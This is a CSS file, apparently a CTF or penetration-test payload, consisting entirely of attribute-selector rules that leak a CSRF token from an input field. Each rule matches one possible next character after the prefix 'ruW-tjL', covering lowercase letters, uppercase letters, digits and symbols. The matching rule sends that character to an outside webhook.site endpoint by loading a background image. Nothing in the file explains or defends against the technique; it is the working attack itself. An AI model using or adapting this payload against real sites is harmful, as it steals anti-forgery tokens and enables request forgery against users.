/* Minuscules */
input[name=csrf][value^="ruW-tjLa"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?a); }
input[name=csrf][value^="ruW-tjLb"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?b); }
input[name=csrf][value^="ruW-tjLc"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?c); }
input[name=csrf][value^="ruW-tjLd"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?d); }
input[name=csrf][value^="ruW-tjLe"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?e); }
input[name=csrf][value^="ruW-tjLf"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?f); }
input[name=csrf][value^="ruW-tjLg"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?g); }
input[name=csrf][value^="ruW-tjLh"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?h); }
input[name=csrf][value^="ruW-tjLi"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?i); }
input[name=csrf][value^="ruW-tjLj"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?j); }
input[name=csrf][value^="ruW-tjLk"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?k); }
input[name=csrf][value^="ruW-tjLl"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?l); }
input[name=csrf][value^="ruW-tjLm"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?m); }
input[name=csrf][value^="ruW-tjLn"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?n); }
input[name=csrf][value^="ruW-tjLo"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?o); }
input[name=csrf][value^="ruW-tjLp"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?p); }
input[name=csrf][value^="ruW-tjLq"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?q); }
input[name=csrf][value^="ruW-tjLr"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?r); }
input[name=csrf][value^="ruW-tjLs"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?s); }
input[name=csrf][value^="ruW-tjLt"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?t); }
input[name=csrf][value^="ruW-tjLu"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?u); }
input[name=csrf][value^="ruW-tjLv"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?v); }
input[name=csrf][value^="ruW-tjLw"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?w); }
input[name=csrf][value^="ruW-tjLx"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?x); }
input[name=csrf][value^="ruW-tjLy"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?y); }
input[name=csrf][value^="ruW-tjLz"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?z); }

/* Majuscules */
input[name=csrf][value^="ruW-tjLA"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?A); }
input[name=csrf][value^="ruW-tjLB"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?B); }
input[name=csrf][value^="ruW-tjLC"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?C); }
input[name=csrf][value^="ruW-tjLD"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?D); }
input[name=csrf][value^="ruW-tjLE"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?E); }
input[name=csrf][value^="ruW-tjLF"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?F); }
input[name=csrf][value^="ruW-tjLG"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?G); }
input[name=csrf][value^="ruW-tjLH"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?H); }
input[name=csrf][value^="ruW-tjLI"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?I); }
input[name=csrf][value^="ruW-tjLJ"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?J); }
input[name=csrf][value^="ruW-tjLK"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?K); }
input[name=csrf][value^="ruW-tjLL"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?L); }
input[name=csrf][value^="ruW-tjLM"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?M); }
input[name=csrf][value^="ruW-tjLN"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?N); }
input[name=csrf][value^="ruW-tjLO"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?O); }
input[name=csrf][value^="ruW-tjLP"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?P); }
input[name=csrf][value^="ruW-tjLQ"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?Q); }
input[name=csrf][value^="ruW-tjLR"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?R); }
input[name=csrf][value^="ruW-tjLS"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?S); }
input[name=csrf][value^="ruW-tjLT"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?T); }
input[name=csrf][value^="ruW-tjLU"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?U); }
input[name=csrf][value^="ruW-tjLV"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?V); }
input[name=csrf][value^="ruW-tjLW"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?W); }
input[name=csrf][value^="ruW-tjLX"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?X); }
input[name=csrf][value^="ruW-tjLY"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?Y); }
input[name=csrf][value^="ruW-tjLZ"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?Z); }

/* Chiffres */
input[name=csrf][value^="ruW-tjL0"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?0); }
input[name=csrf][value^="ruW-tjL1"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?1); }
input[name=csrf][value^="ruW-tjL2"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?2); }
input[name=csrf][value^="ruW-tjL3"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?3); }
input[name=csrf][value^="ruW-tjL4"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?4); }
input[name=csrf][value^="ruW-tjL5"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?5); }
input[name=csrf][value^="ruW-tjL6"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?6); }
input[name=csrf][value^="ruW-tjL7"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?7); }
input[name=csrf][value^="ruW-tjL8"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?8); }
input[name=csrf][value^="ruW-tjL9"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?9); }

/* Caractères spéciaux */
input[name=csrf][value^="ruW-tjL-"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?-); }
input[name=csrf][value^="ruW-tjL_"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?_); }
input[name=csrf][value^="ruW-tjL."] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?.); }
input[name=csrf][value^="ruW-tjL~"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?~); }
input[name=csrf][value^="ruW-tjL!"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?!); }
input[name=csrf][value^="ruW-tjL@"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?@); }
input[name=csrf][value^="ruW-tjL#"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?#); }
input[name=csrf][value^="ruW-tjL$"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?$); }
input[name=csrf][value^="ruW-tjL%"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?%25); } /* % encodé */
input[name=csrf][value^="ruW-tjL^"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?^); }
input[name=csrf][value^="ruW-tjL&"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?&); }
input[name=csrf][value^="ruW-tjL*"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?*); }
